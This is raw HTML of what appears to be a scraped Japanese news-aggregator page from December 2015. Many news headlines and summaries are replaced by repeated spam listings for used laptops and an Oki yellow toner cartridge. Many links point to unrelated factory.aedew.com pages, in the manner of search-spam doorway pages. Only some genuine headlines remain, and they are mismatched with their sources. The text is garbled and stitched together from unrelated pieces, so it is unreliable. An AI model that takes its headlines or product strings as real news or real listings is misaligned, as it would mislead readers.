title="facebook【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n " class="icon icon_facebook"></a> </span> </div> <div id="header_menu" onclick="toggle('drop_menu');"> <div id="drop_menu" style="display:none;"> <ul> <li><a href="" class="selected">トップ</a></li><li><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></li><li><a href="">ニュース総合</a></li><li><a href="">★人気の多機能ノートが激安!★ 富士通 FMV-BIBLO NF50W 2GBメモリ DVDマルチ 無線LAN 15.4型ワイド液晶 WindowsVista 【EIOffice】 【中古】</a></li><li><a href="">エンタメ</a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">★超軽量モバイルノート 無線LAN付★ CF-T5K リカバリ内蔵 新品マウス付き WindowsXP Panasonic Let's Note 軽量モバイルノート MicrosoftOffice2010 【中古パソコン】 【中古】</a></li><li><a href="">科学</a></li><li><a href="">中古パソコン ★21.5インチ液晶一体型PC★ hp Compaq 6000Pro All-in-One 2GBDDR3メモリ Core2Duo DVDマルチ リカバリ内蔵 Windows7Pro 中古パソコン 【MicrosoftOffice付(2010)】 【中古】</a></li><li><a href="">動画</a></li><li><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></li><li><a href="">ネタ</a></li><li><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></li> <li><a href='http://ceron.jp/registered.html'>メディア一覧</a></li> <li><a href=''>ランキング</a></li> <li><a href='https://twitter.com/' target='_blank'>Twitter</a></li> <li><a href=''>ヘルプ</a></li> <li><a href=''>設定</a></li> <li><a href=''>【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></li> </ul> </div> </div> <h1> <a id="logo" href="" title="【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n "> <img class="logo_l" src="../img/logo.png" width="184px" height="54px" /> </h1> <form action="/search" method="get" name="search" id="header_search" onsubmit="return headerSearchReady();"> <div id="input_box"><input type="text" id="header_search_textarea" class="search" name="q" value="" placeholder="キーワード or URL" onclick="if(!this.value){this.setAttribute('AutoComplete','on');}" onkeyup="this.setAttribute('AutoComplete', 'off');" onsubmit="this.setAttribute('AutoComplete', 'on');" /></div> <div class="search_button" onclick="document.getElementById('submitButton').click();"></div> <input type="submit" style="display:none;" id="submitButton" /> </form> </div><!--end header_inner--> </div><!--end header--> <div id="menu_bar" class="menu_bar"> <div id="menu_bar_inner" class="menu_bar_inner"><ul><li><a href="" class="selected">トップ</a></li><li><a href="">速報</a></li><li><a href="">中古パソコン ★リカバリ内蔵で安心 お買い得デスクトップ★ hp Compaq 6005Pro 2GBDDR3メモリ DVD鑑賞OK リカバリ内蔵 Windows7Pro 中古デスクトップ 【MicrosoftOffice付(XP)】 【中古】</a></li><li><a href="">政治経済</a></li><li><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">海外</a></li><li><a href="">科学</a></li><li><a href="">中古パソコン ★DELL ハイスペックワイドノート★ DELL Latitude E5500 2GBメモリ DVDマルチ 無線LAN 15.4型ワイド液晶 Core2Duo P8700 Windows7Pro 中古ノートパソコン 【EIOffice付】 【中古】</a></li><li><a href="">動画</a></li><li><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></li><li><a href="">ネタ</a></li><li><a href="">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="fixed_header" class="menu_bar" style="margin-top:-240px;"> <div id="fixed_header_inner" class="menu_bar_inner"> <a href="/"><img src="../img/logo.png" width="92px" height="27px" /></a> </div> </div> <div id="field"> <div id="field_inner"> <div id="main_column"> <div id="main_column_inner"><div id="pan"></div><a name="area_1"></a> <div class="item_list_box " id="area_1"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ニュース総合</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over500">528<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,★Windows7搭載VAIOスリムノート★ SONY VAIO VGN-FE92S 2GBメモリ Core2Duo搭載 DVDマルチ 無線LAN Windows7 【MicrosoftOfficeXP】 【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン★超軽量!富士通の高性能ワイドモバイル★ 富士通 LIFEBOOK FMV-R8270 2GBDDR3メモリ Core2Duo搭載 無線LAN対応 12.1型ワイド Windows7 中古ノートパソコン 【MicrosoftOffice付(2003)】 【中古】</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★人気のハイエンドワークステーション★DELL Precision T3500 12GBメモリ Xeon w3565 Quadro2000 DVDマルチ BDドライブ Windows7 64Bit 中古デスクトップ 【MicrosoftOffice付(2010)】 【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★人気のVAIO 簡単液晶一体型PC★ 20.1型ワイド液晶一体型 SONY VAIO Type-JSシリーズ 2GBメモリ 無線LAN デュアルコア DVDマルチ Windows7 中古デスクトップパソコン 【MicrosoftOffice付(XP)】 【中古】</span>...[<a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 70 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">398<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410350u22wf.html">http://factory.aedew.com/images/Core2Duo/020410350u22wf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 55 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">198<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://www.yomiuri.co.jp/national/20151226-OYT1T50002.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410382s43ch.html">http://factory.aedew.com/images/Core2Duo/020410382s43ch.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 36 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">194<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/life/news/151226/lif1512260005-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★デュアルコア搭載ワイドノート★NEC Lavie PC-LL850MG GBメモリ Core2Duo 無線LAN DVDマルチ Webカメラ 320GBHDD Windows7 中古ノートパソコン 【MicrosoftOffice付(XP)】 【中古】,無線LAN GeForce搭載 15型WUXGA液晶 DELL Latiude D800 WindowsXP EIOffice 1GBメモリ 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 30 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">191<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT662ZHDTTPJB01B.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★デュアルコア搭載 美品ワイドノート★ NEC VersaPro PC-VY24A/E 3GBメモリ Core2Duo DVDマルチ 無線LAN 15.4型液晶 Windows7 中古ノートパソコン 【MicrosoftOffice付(XP)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 29 --></span> <div class="more"><a href="http://www.yomiuri.co.jp/latestnews/?from=ygnav2">ニュース総合 をもっと見る</a></div> </div> <a name="area_2"></a> <div class="item_list_box " id="area_2"> <div class="list_title"> <div class="controler"></div> <h2><a href="http://factory.aedew.com/images/Core2Duo/020410381p60zh.html">http://factory.aedew.com/images/Core2Duo/020410381p60zh.html</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over100">146<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【岸田外相訪韓】元慰安婦支援で日韓“折半”出資案が浮上 韓国の蒸し返しを封じる狙い(1/2ページ) - 産経ニュース</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/www.sankei.com/politics/news/151226/plt1512260001-n1.html" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,dynabook TX/450DS 1GBメモリ 無線LAN DVDスーパーマルチを搭載したDynaBook WindowsXP スリムノート 東芝 大人気モデル EIOffice 【中古パソコン】 【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,★高性能GPUでゲームも楽しめるノートが訳あり激安★ SONY VAIO VGN-FE52B/H 1GBメモリ DVDマルチ GeForceGo7600 リカバリ内蔵 マイクロソフト?オフィス2007 【中古ノートパソコン】 【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★DVD焼きOK 超軽量モバイル★ 東芝 dynabook SS RX2 2GBメモリ DVDマルチ Core2Duo 無線LAN リカバリ内蔵 Windows7Pro 【MicrosoftOffice付(XP)】【中古】</span>...[<a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 27 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">69<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260002-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【辺野古移設問題】活動家を初の起訴 シュワブ前で機動隊員を蹴る 反対派の活動実態を解明へ(1/2ページ) - 産経ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 16 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://www.yomiuri.co.jp/world/20151225-OYT1T50134.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,★SSD搭載モバイルがちょっと訳ありで格安★ DELL Latitude E4200 2GBDDR3メモリ Core2Duo SSD搭載 無線LAN 12.1型LED液晶 Windows7Pro 【EIOffice】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 13.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="/url/headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int">ソウル日本大使館前の少女像、韓国が移転を検討 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 13 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">86<span>コメント</span></span> <span class="date date_new">17 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00000001-jct-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410434j96lf.html">http://factory.aedew.com/images/Core2Duo/020410434j96lf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 10 --></span> <div class="more"><a href="http://news.yahoo.co.jp/hl?c=bus">政治・経済 をもっと見る</a></div> </div> <a name="area_5"></a> <div class="item_list_box " id="area_5"> <div class="list_title"> <div class="controler"></div> <h2><a href="">IT・テクノロジー</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">24<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank" class="item_direct"> - pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">【モバイラーが憧れた名機を今風に蘇らせる】ソニー「バイオノート505エクストリーム」 ~最初にして最後の究極。これぞモバイラーのステータス - PC Watch</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/d4cd9a68ed5dd7ad42cacbc69a1cf4fe257d279e.jpg" width="160" height="120" onerror="this.parentNode.style.display='none'" style="left:-20px" /></a></div><p>HDDは東芝製の5mm厚の1.8インチタイプ。これもフレキケーブルで接続されている 天板および底面カバーだが、店頭モデルでは「<span>ニッケル強化カーボンモールド」、ソニースタイル専用の直販モデルでは「カーボンファイバー積層板」を採用するとされている。今回入手したのは店頭モデルで、前者を採用している。“ニッケル強化カーボンモ</span>...[<a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">1 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/news/news/20151226_737187.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410325m03bf.html">http://factory.aedew.com/images/Core2Duo/020410325m03bf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">97<span>コメント</span></span> <span class="date date_new">22 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news108.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="">中古パソコン★ちょっと訳あり 地デジ受信可能 ボード型PC★ SONY VAIO VGC-LM51DB 2GBメモリ リカバリ内蔵 500GBHDD DVDマルチ Vista中古デスクトップ 【KingosftOffice付(2013)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">88<span>コメント</span></span> <span class="date date_new">20 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news130.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="http://ceron.jp/url/www.itmedia.co.jp/news/articles/1512/25/news130.html">4文字しか使えないコミュニケーションアプリ「Ping」 - ITmedia ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">13<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/wakiba/find/20151225_737149.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">中古パソコン ★17インチ液晶付属!オマケ付き?★ 富士通 ESPRIMO FMV-D5270 Core2Duo 2.66GHz 2GB DVD鑑賞OK 17型液晶 Windows7 中古デスクトップ 【MicrosoftOffice付(2010)】【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">IT・テクノロジー をもっと見る</a></div> </div> <a name="area_7"></a> <div class="item_list_box " id="area_7"> <div class="list_title"> <div class="controler"></div> <h2><a href="">科学・学問</a></h2> </div> <div class="item"> <div class="item_status"> <span class="link_num over20">22<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news025.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410514s38bf.html">http://factory.aedew.com/images/Core2Duo/020410514s38bf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT7KWMHDTPTIL02V.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">阪大院教授らの研究費不正経理、2.7億円 大学が発表:朝日新聞デジタル</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://karapaia.livedoor.biz/archives/52207962.html" target="_blank" class="item_direct"> - karapaia.livedoor.biz</a></div> <div class="item_title"><a href="">中古パソコン ★VAIOの光沢ワイド液晶モバイル★ SONY VAIO VPCS12AFJ Corei5 4GBメモリ GeForce310M 400GBHDD DVDマルチ 無線LAN Windows7 中古ノートパソコン 【MicrosoftOffice付(2003)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">科学・学問 をもっと見る</a></div> </div> <a name="area_9"></a> <div class="item_list_box " id="area_9"> <div class="list_title"> <div class="controler"></div> <h2><a href="">2chまとめ</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">27<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://alfalfalfa.com/articles/140445.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">書店「Amazonばっかで本買うのやめてや!!」←これ | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3b61c537fc58f529bf419a5c974cab5d82588790.jpg" width="213" height="120" onerror="this.parentNode.style.display='none'" style="left:-46px" /></a></div><p>14:風吹けば名無し@\(^o^)/2015/12/25(金) 10:07:08.94ID:28CoKVMbaXMAS.net焼<span>肉屋の名前みたい34:風吹けば名無し@\(^o^)/2015/12/25(金) 10:09:31.60ID:uAnL49f+0XMAS.net普通に本屋で買ってるぞ54:風吹けば名無し@\(^o^)/2015/12/25(金) 10</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">18<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://blog.esuteru.com/archives/8449829.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">【は?】「『仏滅』『大安』などが書かれたカレンダーを回収します。差別につながるので」 ← 意味不明すぎて理解できないんだが : はちま起稿</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">66<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://blog.livedoor.jp/dqnplus/archives/1864971.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410372g59wf.html">http://factory.aedew.com/images/Core2Duo/020410372g59wf.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://alfalfalfa.com/articles/140453.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">SEALDs「電車で携帯のゲームやるのは知能が低い」 | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">16<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://blog.esuteru.com/archives/8449718.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★ワイド液晶搭載ノート 使用感あり★ DELL Latitude D531 2GBメモリ DVD鑑賞OK 15.4型ワイド液晶 Windows7 中古ノートパソコン 【MicrosoftOffice付(2007)】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://blog.livedoor.jp/kinisoku/archives/4554064.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="">【画像】おい!クリスマスだしこの娘と野球拳しないかい:キニ速</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="more"><a href="">2chまとめ をもっと見る</a></div> </div> <a name="area_10"></a> <div class="item_list_box " id="area_10"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ネタ・話題・トピック</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">90<span>コメント</span></span> <span class="date date_new">15 時間前  </span> <a href="http://togetter.com/li/917078" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">【速報】クリスマスに新たな山下達郎伝説が生まれた!? 「Gの音が出ない」と開始90分後にライブを中止 - Togetterまとめ</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/9ff1006fb7b6091ba48b957edf5a63cce85e1079.jpg" width="120" height="159" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>山下達郎盛岡コンサート、90分やったところでまさかの中止。 本人が喉の調子に納得出来ないとのこと。 来年に無料で再演しにくるとの<span>ことで、伝説に立ち合えたのはラッキーだが、クリスマスイブ聞けなかった。</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 6.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news015.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410453j10bw.html">http://factory.aedew.com/images/Core2Duo/020410453j10bw.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://togetter.com/li/917238" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410439w73xz.html">http://factory.aedew.com/images/Core2Duo/020410439w73xz.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">80<span>コメント</span></span> <span class="date">2015-12-25 12:31</span> <a href="http://togetter.com/li/916919" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">東芝ノート dynabook EX/522CME KingSoftOffice2010 WindowsXP DVDコンボ搭載モデル50 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date">2015-12-25 08:36</span> <a href="http://d.hatena.ne.jp/ikkou2otosata0/touch/20151225/1450992232" target="_blank" class="item_direct"> - d.hatena.ne.jp</a></div> <div class="item_title"><a href="">オッケー、キリスト。ところで、あたしの誕生日の話も聞いとく? - 私の時代は終わった。</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">17<span>コメント</span></span> <span class="date date_new">12 時間前  </span> <a href="http://togetter.com/li/917157" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★デュアルコアで快適 省スペースのマイクロPC★ DELL OptiPlex 755USFF デュアルコア搭載 DVD鑑賞OK Windows7 中古デスクトップ 【EIOffice付】 【中古】</a></div> </div> <span class='debug' style='display:none;'><!--score: 1.5 --></span> <div class="more"><a href="">ネタ・話題・トピック をもっと見る</a></div> </div> <script type="text/javascript"> //現在のセッティングを読み込み var setting = "ct:news:5;ct:society:5;ct:entertainment:5;ct:sports:5;ct:itnews:5;ct:international:3;ct:science:3;ct:odekake:3;ct:2ch:6;ct:neta:6;"; var setting_list = new Array(); setting_split = setting.split(";"); for (var i = 0; i < setting_split.length; i++) { if(!setting_split[i]){continue}; if(m = setting_split[i].match(/^([a-z]*):(.*):(d*)$/)){ setting_list[i+1] = new Array(m[1],m[2],m[3]); }else{ setting_list[i+1] = new Array(); } } controler_set(); </script> <!-- 以下カスタム用HTML --> <div id="edit_area_module" style="display:none;"> <div id="edit_area_AREAID" style="display:none;margin-bottom: 1em;"> <div class="list_title" style="text-align:right;font-size:85%;font-weight:100;"> <a href="javascript:void(0);" onclick="area_change_cancel(AREAID)">キャンセル</a> <div class="controler" style="display:none;"></div> </div> <div id="edit_area_inner_AREAID" style="border:8px solid #ccc;padding:3em 15%;font-size:90%;"> <h3>AREAID 番目のエリア</h3> <p>このエリアに表示するニュースを設定します。</p> <div id="edit_area_1_AREAID"> <select id="select_1_AREAID" onchange="edit_area_2(AREAID)" style="margin-top:1em;"> <option value="">▼表示内容を選んでください▼</option> <option value="ct">カテゴリから選ぶ</option> <option value="kw">任意のキーワードを指定する</option> </select> </div> <br /> <div id="edit_area_2ct_AREAID" style="display:none;"> <select id="select_2ct_AREAID"> <option value="">▼カテゴリを選んでください▼</option> <option value="all">すべての記事</option> <option value="news">ニュース総合</option> <option value="society">政治・経済</option> <option value="international">海外ニュース</option> <option value="entertainment">エンタメ</option> <option value="sports">スポーツ</option> <option value="itnews">IT・テクノロジー</option> <option value="science">科学・学問</option> <option value="odekake">おでかけ・イベント</option> <option value="2ch">2chまとめ</option> <option value="neta">ネタ・話題・トピック</option> <option value="movie">動画</option> <option value="other">その他のニュース</option> </select> </div> <div id="edit_area_2kw_AREAID" style="display:none;"> キーワードを入力してください。<input id="select_2kw_AREAID" type="text" value="KEYWORD" size="32" /><br /> <div style="font-size:85%;color:#666;background:#eee;padding:0.5em;margin:0.5em 0;"> 入力したキーワードにヒットするニュースが配信されます。<br /> <b>複数指定</b>「AAA BBB」:スペースで区切るとAAAかつBBBにマッチする記事を配信します。<br /> <b>OR指定</b>「AAA OR BBB」:AAAまたはBBBにマッチする記事を配信します。ORはパイプ(|)も可。<br /> <b>特定のサイトを指定</b>「site:[URL]」:特定のURLにマッチする記事を配信します。<br /> <b>除外指定</b>「-XXX」:マイナスを付けると「XXX」にマッチする記事を除外します。 </div> </div> <div id="edit_area_3num_AREAID" style="display:none;"> 表示する数:<select id="select_3num_AREAID">NUMLIST</select> </div> <br /> <div style="line-height:2.5;"> <input type="button" value=" 決定 " onclick="area_change_save(AREAID)" style="font-size:150%;"/><br /> <input type="button" value="キャンセル" onclick="area_change_cancel(AREAID)" /> <input type="button" value="このエリアを削除" onclick="area_delete(AREAID)" /> <input type="button" value="この下にエリアを追加" onclick="area_add(AREAID)" /> <br /> <input type="button" value="1つ上へ移動" onclick="area_move(AREAID,-1)" /> <input type="button" value="1つ下へ移動" onclick="area_move(AREAID,1)" /> </div> </div> </div> </div> <!-- カスタム用HTMLここまで --> <div id="top_guidance"> </div><div class='pagenavi'><a href=''>全カテゴリ横断</a> <a href=''>昨日のランキング</a> </div><script type="text/javascript">footerbox_ad();</script></div> </div> <div id="side_column"> <div id="side_column_inner"> <div id="sidefollow"> <script type="text/javascript">sidebox_ad1()</script> <div id="side_flash" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">速報</a></h2></div> <div class="item_list_box"><div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/63a4858e236b" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="">2016年新ヒーロー戦隊は「動物戦隊ジュウオウジャー」 - LINE NEWS</a></div> </div> <div class="item"> <div class="item_status"> <span class="link_num over3">11<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/eee8981f1889" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410325m03bf.html">http://factory.aedew.com/images/Core2Duo/020410325m03bf.html</a></div> </div> <div id="side_imgs" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">画像で見る主要ニュース</a></h2></div> <div class="item_list_box"><div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over500">506<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a 